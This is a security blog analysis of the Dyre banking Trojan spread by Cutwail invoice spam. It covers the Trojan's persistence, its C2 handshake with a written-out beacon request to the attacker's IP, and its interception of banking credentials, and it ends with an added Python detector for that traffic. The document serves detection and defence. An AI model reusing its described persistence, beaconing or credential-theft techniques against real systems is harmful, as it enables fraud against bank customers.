SpiderLabs Blog

Analysis of a New Banking Trojan Spammed by Cutwail

Written by Rodel Mendrez | Jul 2, 2014 1:19:00 PM

The Cutwail spambot has a long history of sending spam with attached malicious files such as Zbot, Blackhole Exploit Kit and Cryptolocker. Another trick in Cutwail's portfolio is to use links pointing to popular file hosting services. Over the past weeks, we have observed spam that claims to be an unpaid invoice from a certain bank.

Influx of Invoice Spam Campaign detected by Trustwave Secure Email Gateway

Currently, one of the most common themes in malicious spam campaigns is a claimed invoice or product order, delivered either as a ZIP file attachment or as a link to a ZIP/RAR file hosted on the web. This high-volume campaign contains links to the file sharing services Dropbox and Cubby. The files hosted are ZIP files with filenames such as invoice_<digit>.zip and document_<digit>.zip.

Malware Payload

After downloading and extracting the malware, we noticed that it uses an Adobe PDF icon to trick users into believing it is a harmless portable document file. When run, the executable file drops a copy of itself into the Windows %AppData% (application data) directory as googleupdaterr.exe. It then creates an autorun registry entry to execute itself at Windows startup:

HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run
GoogleUpdate = "%AppData%\googleupdaterr.exe"

Code stored in the malware's body is then injected into Explorer.exe. The malware also creates an infection marker in the Explorer.exe process by creating a mutex named "RangisMutex5".

Antivirus companies have dubbed the loader of this new banking Trojan "Dyranges" or "Trojan Dyzap", and the DLL code injected into explorer.exe carries the same names. The detection name was perhaps taken from a PDB path found in the malware body:

The malware PDB path of a project named DYRE. Interesting fact: "zapuskator2.pdb" is a Russian translation of "executer2.pdb".

A configuration file named userdata.dat is then dropped in the %AppData% directory containing the BotID, encrypted configuration and a Boolean variable named "AUTOBACKCONN". We assume that setting AUTOBACKCONN to True enables the persistent connection of the bot to its command and control server.

Right after the malware installation, the Trojan sends the following GET requests to its command and control server at the IP address 192.99.6.61. Here is the sequence of communication with the server:

  1. The first GET request is the "publickey" request using the format "/cho1017/<botid>/5/publickey/".
  2. The bot then reports the OS version of the infected system to its C&C server using the format "/cho1017/<botid>/0/<Windows Version>/".
  3. The bot then sends an unknown GET request "/58/1/", after which the C&C server replies with the ThreadID.

After the initial server handshake, the Trojan tries to maintain connectivity to its server through an ongoing GET request using the format:

GET /cho1017/<botid>/1/<base64 data>/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61
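As an added example (not code from the original post or from Trustwave), the Python below matches the request shapes listed above in web proxy logs and reports whether a client completed the publickey, OS report and beacon sequence. The log line layout, the sample lines and the bot IDs are constructed, and the bot ID and Windows version formats are assumptions since the post does not show them.

```python
import re
from collections import defaultdict

# URL shapes from the write-up. The bot ID format is not shown on the page, so
# it is matched as any single path segment (assumption). The last field is
# matched greedily because base64 data may itself contain "/".
C2_PATH = re.compile(r"^/cho1017/(?P<botid>[^/]+)/(?P<cmd>[015])/(?P<arg>.+)/$")
STAGE = {"5": "publickey", "0": "os_report", "1": "beacon"}
C2_HOST = "192.99.6.61"
BOT_UA = "Wget/1.9"

def classify(host, path, user_agent):
    """Return (stage, botid, score) for one request, or None if it does not match."""
    m = C2_PATH.match(path)
    if not m or (m["cmd"] == "5" and m["arg"] != "publickey"):
        return None
    # The path shape is the primary signal; known host and UA raise the score.
    score = 1 + int(host == C2_HOST) + int(user_agent == BOT_UA)
    return STAGE[m["cmd"]], m["botid"], score

def scan(lines):
    """Group matches by client. Constructed log format: 'client host ua path'."""
    hits = defaultdict(list)
    for line in lines:
        fields = line.strip().split(" ", 3)
        if len(fields) != 4:
            continue  # skip malformed lines
        client, host, ua, path = fields
        result = classify(host, path, ua)
        if result:
            hits[client].append(result)
    return dict(hits)

def handshake_seen(stages):
    """True when publickey, os_report and beacon appear in that order."""
    remaining = iter(stages)
    return all(stage in remaining for stage in ("publickey", "os_report", "beacon"))

# Constructed sample proxy log lines (not captured traffic).
SAMPLE = [
    "10.0.0.5 192.99.6.61 Wget/1.9 /cho1017/BOT-EXAMPLE-01/5/publickey/",
    "10.0.0.5 192.99.6.61 Wget/1.9 /cho1017/BOT-EXAMPLE-01/0/Win_7_SP1/",
    "10.0.0.5 192.99.6.61 Wget/1.9 /cho1017/BOT-EXAMPLE-01/1/QUJDRA==/",
    "10.0.0.9 example.org Mozilla/5.0 /downloads/1/readme/",
    "10.0.0.7 203.0.113.10 Wget/1.9 /cho1017/BOT-EXAMPLE-02/1/YWJj/ZGVm/",
]

if __name__ == "__main__":
    for client, found in scan(SAMPLE).items():
        print(client, [s for s, _, _ in found], handshake_seen(s for s, _, _ in found))
```

Matching on the path shape rather than only on the IP address keeps the check useful if the server moves, while the score separates a full match on host and User-Agent from a path-only match.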

This banking Trojan hooks Google Chrome, Firefox or Internet Explorer browsers. This browser hooking function enables the Trojan to intercept user searches, browser cookies and sensitive banking information.

The Trojan then monitors a list of banking websites. When a victim visits a banking website being monitored, the information entered by the victim is intercepted and sent to the cybercriminal's server. The snippet of code below is the function where the Trojan monitors various banking URLs and where the intercepted data is sent to a remote IP address at port 12081.

The packet capture below shows the POST request intercepted by the Trojan right after log-in to a monitored banking website. The POST data, which includes the login credentials and cookies, is sent to the cybercriminal's server.

Acting as a man-in-the-middle, the Trojan sends the intercepted POST data to the cybercriminal's IP address. But the data is also sent through the normal SSL-encrypted tunnel between the victim's browser and the bank's web server, which hides the suspicious activity going on in the background.

As of this writing, the offending IP address is offline. We are not sure if it was taken down or the cybercriminal moved to a different server. But according to our intelligence, the attacker's IP address was linked to an underground drop ship service Global Blackpoint, a service popular for carders (and other scammers). It also hosts various phishing pages targeting banking institutions.

Global Blackpoint Login Panel

To wrap up, we always advise users to be wary when clicking links in emails. Extra scrutiny should be placed on links to common file sharing websites such as Dropbox and Cubby, especially now that cybercriminals have started to utilize them for hosting their malware. Trustwave Secure Email Gateway users are protected from this malicious spam campaign.